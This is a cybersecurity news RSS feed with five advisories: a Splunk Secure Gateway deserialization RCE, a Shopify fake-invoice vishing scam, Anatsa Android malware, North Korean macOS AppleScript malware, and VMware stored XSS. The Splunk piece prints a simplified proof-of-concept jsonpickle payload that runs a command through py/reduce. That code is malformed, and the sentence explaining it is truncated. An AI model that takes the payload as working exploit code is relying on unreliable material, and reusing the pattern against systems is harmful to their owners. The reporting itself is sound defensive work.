			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Splunk Secure Gateway RCE Vulnerability Discovered</title>
		<link>https://firsthackersnews.com/splunk-secure-gateway-rce/</link>
					<comments>https://firsthackersnews.com/splunk-secure-gateway-rce/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 29 Jun 2026 09:47:00 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Remote code execution]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Authentication]]></category>
		<category><![CDATA[CVE-2026-20251]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[deserialization]]></category>
		<category><![CDATA[Enterprise Security]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[remote code execution]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[Splunk]]></category>
		<category><![CDATA[Splunk Secure Gateway]]></category>
		<category><![CDATA[Splunk Security]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11928</guid>

					<description><![CDATA[<p>A high-severity vulnerability, CVE-2026-20251, has been identified in Splunk Secure Gateway (SSG), potentially allowing authenticated users with low-level</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/splunk-secure-gateway-rce/">Splunk Secure Gateway RCE Vulnerability Discovered</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A high-severity vulnerability, <strong>CVE-2026-20251</strong>, has been identified in Splunk Secure Gateway (SSG), potentially allowing authenticated users with low-level privileges to execute arbitrary code on affected systems. The flaw carries a <strong>CVSS score of 8.8</strong> and poses a significant risk to organizations using Splunk Secure Gateway in enterprise environments.</p>



<p>According to security researchers, the vulnerability is caused by unsafe deserialization of user-controlled data, allowing specially crafted input to be executed on the server.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerability Works</strong></h2>



<p>The issue exists in the way Splunk Secure Gateway processes alert data stored in its KV Store. A low-privileged authenticated user can submit a specially crafted JSON payload through the Splunk REST API.</p>



<p>Due to weaknesses in the application&#8217;s validation process, the malicious data is accepted as legitimate and passed to the deserialization component. This enables attackers to execute arbitrary Python code with the privileges of the Splunk service account.</p>



<p>Researchers found that the validation logic fails to inspect all fields within the submitted JSON document. As a result, attackers can bypass security checks by embedding malicious content inside otherwise valid data structures.</p>



<p>A successful attack requires only a valid low-privileged Splunk account and does not rely on user interaction, making the vulnerability particularly dangerous in shared enterprise environments.</p>



<p><strong>Below is a simplified proof-of-concept (PoC) demonstrating how the vulnerability can be exploited using a benign command:</strong></p>



<p>import jsonpickle </p>



<p>import subprocess </p>



<p>payload = {     </p>



<p>&#8220;py/object&#8221;: &#8220;spacebridgeapp.data.alert_data.Alert&#8221;,</p>



<p>     &#8220;notification&#8221;:         </p>



<p>&#8220;py/reduce&#8221;: </p>



<p>[             </p>



<p>{&#8220;py/function&#8221;: &#8220;subprocess.check_output&#8221;},             </p>



<p>{&#8220;py/tuple&#8221;: [[&#8220;uname&#8221;, &#8220;-a&#8221;]]}         </p>



<p>]     </p>



<p>} </p>



<p>} </p>



<p>encoded = jsonpickle.encode(payload) </p>



<p>decoded = jsonpickle.decode(encoded, safe=True) </p>



<p>print(decoded)</p>



<p><code>subprocess.check_output(["uname", "-a"])</code> command during data deserialization. This confirms that enabling the <code>safe=True</code> option in <strong>jsonpickle</strong> does not fully prevent exploitation.</p>



<p>The flaw affects <strong>Splunk Secure Gateway</strong> versions <strong>3.8.x, 3.9.x, and 3.10.x</strong>, along with <strong>Splunk Enterprise</strong> versions released before <strong>10.0.7, 10.2.4, and 10.4.0</strong>. Splunk has fixed the issue in <strong>Secure Gateway versions 3.8.67, 3.9.20, and 3.10.6</strong>.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>To reduce the risk of exploitation, organizations should:</p>



<ul class="wp-block-list">
<li><strong>Apply the latest Splunk Secure Gateway security patches</strong> immediately.</li>



<li><strong>Upgrade to the fixed versions:</strong> SSG <strong>3.8.67</strong>, <strong>3.9.20</strong>, or <strong>3.10.6</strong>, and supported Splunk Enterprise releases.</li>



<li><strong>Disable the Secure Gateway app</strong> if it is not actively being used.</li>



<li><strong>Restrict KV Store write permissions</strong> to trusted administrators only.</li>



<li><strong>Enforce the principle of least privilege</strong> by limiting access to authorized users.</li>



<li><strong>Avoid deserializing untrusted data</strong> with <code>jsonpickle</code> or similar libraries without proper validation.</li>



<li><strong>Implement input validation and class allow-listing</strong> to prevent unsafe deserialization.</li>



<li><strong>Monitor Splunk logs</strong> for unusual activity or unauthorized changes to the KV Store.</li>
</ul>



<p>Following these best practices can help organizations reduce the risk of remote code execution and strengthen the overall security of their Splunk environment.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/splunk-secure-gateway-rce/">Splunk Secure Gateway RCE Vulnerability Discovered</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/splunk-secure-gateway-rce/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fake Shopify Invoices Steal User Credentials</title>
		<link>https://firsthackersnews.com/shopify-fake-invoice-scam/</link>
					<comments>https://firsthackersnews.com/shopify-fake-invoice-scam/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Fri, 26 Jun 2026 17:39:13 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Consumer Security]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Fake Invoice Scam]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[Information security]]></category>
		<category><![CDATA[online scam]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Scam Alert]]></category>
		<category><![CDATA[Shop App]]></category>
		<category><![CDATA[Shopify]]></category>
		<category><![CDATA[social engineering]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<category><![CDATA[vishing]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11923</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a new phishing campaign in which scammers abuse Shopify and its Shop order-tracking app</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/shopify-fake-invoice-scam/">Fake Shopify Invoices Steal User Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a new phishing campaign in which scammers abuse Shopify and its Shop order-tracking app to deliver fake invoices directly to users. Instead of relying on traditional phishing emails, attackers are placing fraudulent purchase notifications inside a trusted shopping application, making the scam appear more convincing.</p>



<p>The fake invoices often impersonate well-known brands such as Norton, McAfee, Apple, and PayPal, creating a false sense of urgency by claiming that expensive products or subscriptions have been purchased.</p>



<h2 class="wp-block-heading"><strong>How the Scam Works</strong></h2>



<p>The Shop app automatically collects order information from connected email accounts and Shop Pay transactions, allowing users to view all their purchases in one place. Attackers appear to be exploiting this functionality or related merchant processes to insert fake orders into users&#8217; purchase history.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="576" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1024x576.png" alt="" class="wp-image-11924" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-300x169.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-768x432.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1024x576.png 1024w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1536x864.png 1536w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Source: Gen Digital</em></figcaption></figure>



<p>These fraudulent orders typically display costly items, including antivirus subscriptions, smartphones, or gift cards. The invoices also include fake customer support phone numbers hidden within product descriptions, shipping details, or order notes.</p>



<p>When victims call the number, they are connected to scammers posing as customer support representatives. The attackers then attempt to steal sensitive information such as login credentials, payment card details, one-time passwords, or convince victims to install remote access software.</p>



<p>Researchers emphasized that there is currently <strong>no evidence that Shopify or the Shop app has been breached</strong>. Instead, the campaign appears to abuse legitimate platform features to distribute fraudulent content.</p>



<h2 class="wp-block-heading"><strong>How to Stay Safe</strong></h2>



<p>Users should always verify unexpected purchase notifications before taking any action. If an invoice appears suspicious, check your bank account or the official service provider directly instead of calling phone numbers listed in the receipt.</p>



<p>To reduce the risk of becoming a victim:</p>



<ul class="wp-block-list">
<li>Verify purchases through official websites or banking apps.</li>



<li>Never call support numbers included in unexpected invoices.</li>



<li>Report suspicious orders through the Shop app or Shopify&#8217;s abuse channels.</li>



<li>Avoid installing software at the request of unknown callers.</li>
</ul>



<p>This campaign demonstrates how cybercriminals are increasingly exploiting trusted platforms instead of relying solely on phishing emails. As users become more cautious of email scams, attackers are shifting their focus to legitimate applications where fraudulent content is less likely to raise suspicion.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/shopify-fake-invoice-scam/">Fake Shopify Invoices Steal User Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/shopify-fake-invoice-scam/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Malware Hidden in Fake Android Reader App</title>
		<link>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/</link>
					<comments>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 24 Jun 2026 16:59:25 +0000</pubDate>
				<category><![CDATA[Android banking trojan]]></category>
		<category><![CDATA[Android malware]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Anatsa]]></category>
		<category><![CDATA[android malware]]></category>
		<category><![CDATA[android security]]></category>
		<category><![CDATA[banking malware]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[cyber threats]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[google play store]]></category>
		<category><![CDATA[Information security]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[mobile malware]]></category>
		<category><![CDATA[mobile security]]></category>
		<category><![CDATA[security research]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11905</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a new Android malware campaign that used a fake document reader application to distribute</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/">Malware Hidden in Fake Android Reader App</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a new Android malware campaign that used a fake document reader application to distribute the Anatsa banking trojan. The app appeared to be a legitimate file-reading utility on the Google Play Store and gained more than 100,000 downloads before malicious functionality was activated.</p>



<p>The application initially behaved like a normal productivity tool, helping it gain user trust and positive ratings. Once a significant user base was established, attackers pushed an update that downloaded and installed the Anatsa malware from a remote server.</p>



<h2 class="wp-block-heading"><strong>How the Attack Worked</strong></h2>



<p>The malicious app was disguised as a document reader and file management tool. Early versions appeared harmless, allowing the application to gain credibility and attract thousands of users. After reaching a large install base, a malicious update downloaded the Anatsa payload and connected to attacker-controlled servers.</p>



<p>Researchers identified the following indicators of compromise (IOCs):</p>



<ul class="wp-block-list">
<li>Installer MD5: <strong>f72b1a333fa28b133df6476561142d6a</strong></li>



<li>Payload MD5: <strong>61d25684e6f42e386f40ee60f5c54dca</strong></li>



<li>Command-and-Control Server: <strong>hxxp://162.252.173[.]37:85/api</strong></li>
</ul>



<h2 class="wp-block-heading"><strong>Why Anatsa Is Dangerous</strong></h2>



<p>Anatsa is a banking trojan designed to steal financial information from Android users. Once active, it monitors devices for targeted banking applications and uses fake screens to capture credentials while hiding suspicious activity from victims.</p>



<p>This campaign follows a strategy commonly used by Anatsa operators. Instead of releasing malware immediately, attackers first build trust through seemingly legitimate apps. By the time the malicious update is delivered, the application has already accumulated downloads, ratings, and user confidence.</p>



<h2 class="wp-block-heading"><strong>How to Stay Protected</strong></h2>



<ul class="wp-block-list">
<li>Review recently installed document-reader and file-management apps.</li>



<li>Be cautious of apps that suddenly request new permissions after updates.</li>



<li>Remove suspicious applications and scan affected devices immediately.</li>
</ul>



<p>The incident serves as a reminder that even apps downloaded from official stores should be carefully evaluated. High download numbers and positive reviews alone are not enough to guarantee safety.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/">Malware Hidden in Fake Android Reader App</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Sapphire Sleet Targets macOS With Multi-Stage Malware</title>
		<link>https://firsthackersnews.com/sapphire-sleet-macos-malware/</link>
					<comments>https://firsthackersnews.com/sapphire-sleet-macos-malware/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 17 Jun 2026 21:21:21 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[MacOS]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Apple security]]></category>
		<category><![CDATA[AppleScript Malware]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[Cryptocurrency Wallet Theft]]></category>
		<category><![CDATA[cyber threats]]></category>
		<category><![CDATA[Cybersecurity News]]></category>
		<category><![CDATA[data theft]]></category>
		<category><![CDATA[endpoint security]]></category>
		<category><![CDATA[Information Stealer]]></category>
		<category><![CDATA[macos malware]]></category>
		<category><![CDATA[macOS Security]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[North Korean Hackers]]></category>
		<category><![CDATA[sapphire sleet]]></category>
		<category><![CDATA[security research]]></category>
		<category><![CDATA[TCC Bypass]]></category>
		<category><![CDATA[Telegram Bot API]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11865</guid>

					<description><![CDATA[<p>Researchers have uncovered a new macOS malware campaign linked to the North Korean threat group known as Sapphire</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/sapphire-sleet-macos-malware/">Sapphire Sleet Targets macOS With Multi-Stage Malware</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Researchers have uncovered a new macOS malware campaign linked to the North Korean threat group known as Sapphire Sleet. The attackers are using fake software update files disguised as Zoom and Microsoft Teams SDK updates to trick users into infecting their systems.</p>



<p>The campaign relies on AppleScript files that appear harmless at first glance but secretly execute multiple stages of malware in the background. By using built-in macOS tools, the attackers can avoid several security protections and quietly deploy additional payloads.</p>



<h2 class="wp-block-heading"><strong>How the Attack Works</strong></h2>



<p>The infection begins when a user opens a malicious AppleScript (.scpt) file disguised as a software update.</p>



<figure class="wp-block-image size-full"><img decoding="async" width="947" height="390" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-1.png" alt="" class="wp-image-11866" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-1-300x124.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-1-768x316.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-1.png 947w" sizes="(max-width: 947px) 100vw, 947px" /><figcaption class="wp-element-caption"><strong>Malicious .scpt file used to initiate the attack (Source: Microsoft)</strong><br></figcaption></figure>



<p>The script displays a large block of harmless-looking text while hidden code runs in the background. Once executed, it uses the curl command to download additional AppleScript payloads from attacker-controlled servers and immediately executes them through osascript.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="855" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1024x855.png" alt="" class="wp-image-11867" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-300x251.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-768x641.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1024x855.png 1024w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1536x1283.png 1536w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><strong>Process flow showing malware execution stages (Source: Microsoft)</strong><br></figcaption></figure>



<p>This multi-stage approach allows attackers to:</p>



<ul class="wp-block-list">
<li>Download additional malware</li>



<li>Communicate with command-and-control servers</li>



<li>Establish persistence on the device</li>



<li>Deploy backdoors</li>



<li>Harvest credentials</li>



<li>Collect sensitive information</li>
</ul>



<p>Researchers noted that this technique helps the attackers bypass several macOS security checks because the execution appears to be initiated by the user.</p>



<h2 class="wp-block-heading"><strong>Credential Theft and Data Collection</strong></h2>



<p>The malware includes several components designed to steal valuable information from infected systems.</p>



<p>Capabilities observed in the campaign include:</p>



<ul class="wp-block-list">
<li>Stealing macOS passwords</li>



<li>Harvesting browser data</li>



<li>Collecting cryptocurrency wallet information</li>



<li>Accessing Telegram session data</li>



<li>Extracting SSH keys</li>



<li>Gathering Apple Notes data</li>



<li>Capturing system information</li>



<li>Uploading stolen files to attacker infrastructure</li>
</ul>



<p>One component displays a legitimate-looking password prompt to trick users into entering their system credentials. Once verified, the credentials are sent to the attackers.</p>



<p>Researchers also found attempts to manipulate macOS Transparency, Consent, and Control (TCC) settings, allowing the malware to gain broader access to files and applications without generating additional security warnings.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>Microsoft and Apple have released protections to help detect and block this activity. Apple updated XProtect and Safe Browsing protections, while Microsoft added new detection capabilities to Microsoft Defender.</p>



<p>Security teams are encouraged to:</p>



<ul class="wp-block-list">
<li>Avoid running unsolicited .scpt files</li>



<li>Verify software updates through official vendor websites</li>



<li>Monitor suspicious curl and osascript activity</li>



<li>Restrict execution of unsigned applications</li>



<li>Watch for unusual TCC database modifications</li>



<li>Rotate credentials if compromise is suspected</li>



<li>Use hardware wallets for cryptocurrency storage</li>
</ul>



<p>The campaign highlights how threat actors continue to abuse trusted macOS tools and social engineering techniques to bypass security controls and gain access to sensitive user data.</p>



<h2 class="wp-block-heading"><strong>Indicators of compromise</strong></h2>



<p><strong>Malicious file hashes</strong></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>File</strong></td><td><strong>SHA-256</strong></td></tr><tr><td>/Users/&lt;user&gt;/Downloads/Zoom SDK Update.scpt</td><td>2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419</td></tr><tr><td>MSTeams SDK Update.scpt</td><td>980bf65c703edae7b28a752207a84b80332be0dae4ee87f00928f82a011ab0ce</td></tr><tr><td>/Users/&lt;user&gt;/com.apple.cli</td><td>05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53</td></tr><tr><td>/Users/&lt;user&gt;/com.microsoft.helper</td><td>3e6fcace412827b14d4af9fc7ca1b8867f75f40c589f3fdca50e988466f00279</td></tr><tr><td>/Users/&lt;user&gt;/.google.doc</td><td>5f457c492773b832054d007ba94d2e89c22dac8458dc9dc1b1d91896777c0c9f</td></tr><tr><td>/Users/&lt;user&gt;/.com.apple.helpers</td><td>97ccc28808d2c21b83f24835744af754920a992e57216d2cbc8315664905b0e2</td></tr><tr><td>/Users/&lt;user&gt;/Library/Services/services<br>&nbsp;services / icloudz</td><td>5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7</td></tr><tr><td>com.google.chromes.updaters</td><td>5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5</td></tr><tr><td>com.google.webkit.service.plist</td><td>95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63</td></tr><tr><td>com.apple.identification.plist</td><td>fcd0c4f9d4311de6f400cc61f476dd60ae06f8d19568dbbaa1a118e1a0ff68ab</td></tr><tr><td>/private/tmp/SystemUpdate/systemupdate.app/Contents/MacOS/Mac Password Popup</td><td>8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c</td></tr><tr><td>/private/tmp/SoftwareUpdate/softwareupdate.app/Contents/MacOS/Mac Password Popup</td><td>a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/sapphire-sleet-macos-malware/">Sapphire Sleet Targets macOS With Multi-Stage Malware</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/sapphire-sleet-macos-malware/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>VMware Stored XSS Flaws Put Enterprise Environments at Risk</title>
		<link>https://firsthackersnews.com/vmware-stored-xss-flaws/</link>
					<comments>https://firsthackersnews.com/vmware-stored-xss-flaws/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 08 Jun 2026 12:33:00 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Secuirty Update]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11794</guid>

					<description><![CDATA[<p>VMware has disclosed three high-severity security vulnerabilities affecting VMware Cloud Foundation (VCF) Operations that could allow attackers to</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/vmware-stored-xss-flaws/">VMware Stored XSS Flaws Put Enterprise Environments at Risk</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>VMware has disclosed three high-severity security vulnerabilities affecting VMware Cloud Foundation (VCF) Operations that could allow attackers to inject malicious scripts into management interfaces.</p>



<p>The vulnerabilities, tracked as <strong>CVE-2026-41722, CVE-2026-41723, and CVE-2026-41724</strong>, were published under security advisory <strong>VMSA-2026-0004</strong> on June 8, 2026. The flaws carry a <strong>CVSS score of 8.0</strong>, highlighting the potential risk to enterprise environments running affected versions of VCF Operations.</p>



<p>Because these vulnerabilities involve stored cross-site scripting (XSS), attackers may be able to plant malicious code that executes whenever administrators access compromised sections of the platform.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerabilities Work</strong></h2>



<p>According to VMware, the flaws stem from improper handling of user-supplied input within VCF Operations management interfaces.</p>



<p>The platform fails to properly validate and sanitize certain data before displaying it to users. As a result, attackers can store malicious JavaScript code within the application. When an administrator or another privileged user later views the affected page, the malicious script automatically executes in their browser.</p>



<p>Unlike reflected XSS attacks, stored XSS remains embedded in the application until removed, increasing the chances of successful exploitation.</p>



<p>A successful attack could allow threat actors to:</p>



<ul class="wp-block-list">
<li>Hijack administrator sessions</li>



<li>Steal authentication tokens</li>



<li>Access sensitive information</li>



<li>Modify configuration settings</li>



<li>Perform unauthorized actions</li>



<li>Maintain persistence within the environment</li>



<li>Potentially move deeper into connected infrastructure</li>
</ul>



<h2 class="wp-block-heading"><strong>Why Organizations Should Take This Seriously</strong></h2>



<p>VCF Operations often serves as a central management platform for virtualization, cloud resources, and infrastructure operations. In many organizations, it integrates with other VMware services, including vCenter and cloud automation environments.</p>



<p>Because of this connectivity, a successful compromise could have broader consequences beyond a single application.</p>



<p>Security experts warn that attackers may attempt to combine these vulnerabilities with other weaknesses or misconfigurations to gain additional access and privileges across enterprise environments.</p>



<p>The risk is especially high in organizations where multiple administrators regularly access shared management consoles, as any authorized user visiting a compromised interface could unknowingly trigger the malicious code.</p>



<h2 class="wp-block-heading"><strong>No Workarounds Available</strong></h2>



<p>VMware has confirmed that there are currently <strong>no workarounds</strong> for these vulnerabilities.</p>



<p>Organizations are strongly advised to install the latest security updates as soon as possible. Delaying remediation could increase the risk of exploitation, particularly if proof-of-concept code becomes publicly available.</p>



<p>Administrators should also consider the following security measures:</p>



<ul class="wp-block-list">
<li>Apply VMware security patches immediately</li>



<li>Restrict access to VCF Operations interfaces</li>



<li>Monitor logs for unusual activity</li>



<li>Review administrator account permissions</li>



<li>Watch for suspicious session behavior</li>



<li>Investigate unexpected script execution events</li>



<li>Strengthen overall access controls</li>
</ul>



<p>While web application firewalls and browser security controls may provide limited protection, VMware emphasizes that these measures should not replace patching.</p>



<p>The disclosure of these vulnerabilities serves as another reminder that enterprise management platforms remain valuable targets for attackers. Securing these critical control systems is essential for protecting modern virtualized and cloud-based environments.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/vmware-stored-xss-flaws/">VMware Stored XSS Flaws Put Enterprise Environments at Risk</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/vmware-stored-xss-flaws/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
